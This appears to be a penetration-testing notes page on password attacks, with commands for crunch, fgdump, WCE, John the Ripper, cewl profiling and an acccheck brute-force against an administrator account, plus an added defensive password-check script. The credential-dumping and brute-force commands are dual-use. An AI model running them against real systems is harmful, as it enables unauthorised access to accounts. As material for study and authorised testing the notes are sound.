Password Attacks

Various password attacks

Password Attacks are based on:

  1. Guess

  2. Brute-force

  3. Dictionary

Crunch

man crunch 
ls -la /usr/share/crunch/charset.lst 

crunch 6 6 0123456789ABCDEF -o list.txt 
# Create a file of passwords 6 characters long using 0-F and save it to a file 

crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha -o mixedalpha.txt 
# 4 character passwords using pre-defined crunch list 

crunch 8 8 -t ,@@^^%%% |more 
# Generates passwords such as Abc$#123, Jud()666, Hol&&278 (, = uppercase, @ = lowercase, ^ = symbol, % = digit)

PWdump/FGdump

You need admin access to run these two tools.

fgdump.exe 
# Run it. Dumps the hashes to a file to be used and cracked later 

type 127.0.0.1.pwdump 
# Access the contents of the file generated from fgdump.exe command

WCE (Windows Credential Editor)

Need admin access.

wce64.exe -w 
# Run it. Dumps passwords in clear text

John the Ripper

john hashes.txt 
# Run it. Cracks the password hashes on Kali Linux using a dictionary/brute-force attack (may take a long time)

Password Profiling

Collect words and phrases associated with the organisation and include them in our wordlist (e.g. 33 Company uses "thirtythree" password combinations).

Tool: cewl. Creates password candidates from words/phrases.

cewl www.domain.com -m 6 -w /root/domain-cel.txt 
# Creates a wordlist file for the domain (words of at least 6 characters)

In combination with John the Ripper

vi /etc/john/john.conf 
(ADD) $[0-9]$[0-9] 
# The added rule appends two digits to each word
john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt
# Writes the mutated wordlist to mutated.txt
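
From the defender's side, the profiling technique above translates into a check at password-set time: reject any password built on an organisation word plus simple mutations such as appended digits. The sketch below is an added example, not part of the original notes; the word list, the substitution table and the `profile_hits` name are assumptions made for illustration, and it generalises the two-digit rule to any leading or trailing digits and symbols.

```python
import re

# Constructed sample: words a crawl of the organisation's own site could
# yield (hypothetical values, not taken from the original page).
PROFILE_WORDS = {"megacorp", "thirtythree", "widgets"}

# Assumed table of common character substitutions, undone before comparing.
LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a",
                      "5": "s", "7": "t", "@": "a", "$": "s"})

_EDGE_NON_LETTERS = re.compile(r"^[^a-z]+|[^a-z]+$")


def _strip_edges(text):
    """Drop digits/symbols added before or after a word ("megacorp07")."""
    return _EDGE_NON_LETTERS.sub("", text)


def _variants(password):
    """Normalised forms of a password with simple mutations undone."""
    low = password.lower()
    core = _strip_edges(low)
    return {
        core,                                # Megacorp07  -> megacorp
        core.translate(LEET),                # M3gacorp07  -> megacorp
        _strip_edges(low.translate(LEET)),   # Th1rtyThr33 -> thirtythree
    }


def profile_hits(password, words=PROFILE_WORDS, min_len=6):
    """Return the profile words this password is built on (empty = none)."""
    forms = _variants(password)
    return sorted(
        w for w in words
        if len(w) >= min_len and any(w.lower() in f for f in forms)
    )


if __name__ == "__main__":
    for candidate in ["Megacorp07", "M3gacorp99!", "Th1rtyThr33",
                      "correct-horse-battery"]:
        hits = profile_hits(candidate)
        print(f"{candidate!r}: {'REJECT ' + str(hits) if hits else 'ok'}")
```

Feed the check the same kind of site-derived word list an attacker would collect, so the filter and the attack start from the same vocabulary.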

Brute force password attack on administrator.

acccheck -v -t 10.10.10.10 -u administrator -P /usr/share/dirb/wordlists/common.txt

Last updated 5 years ago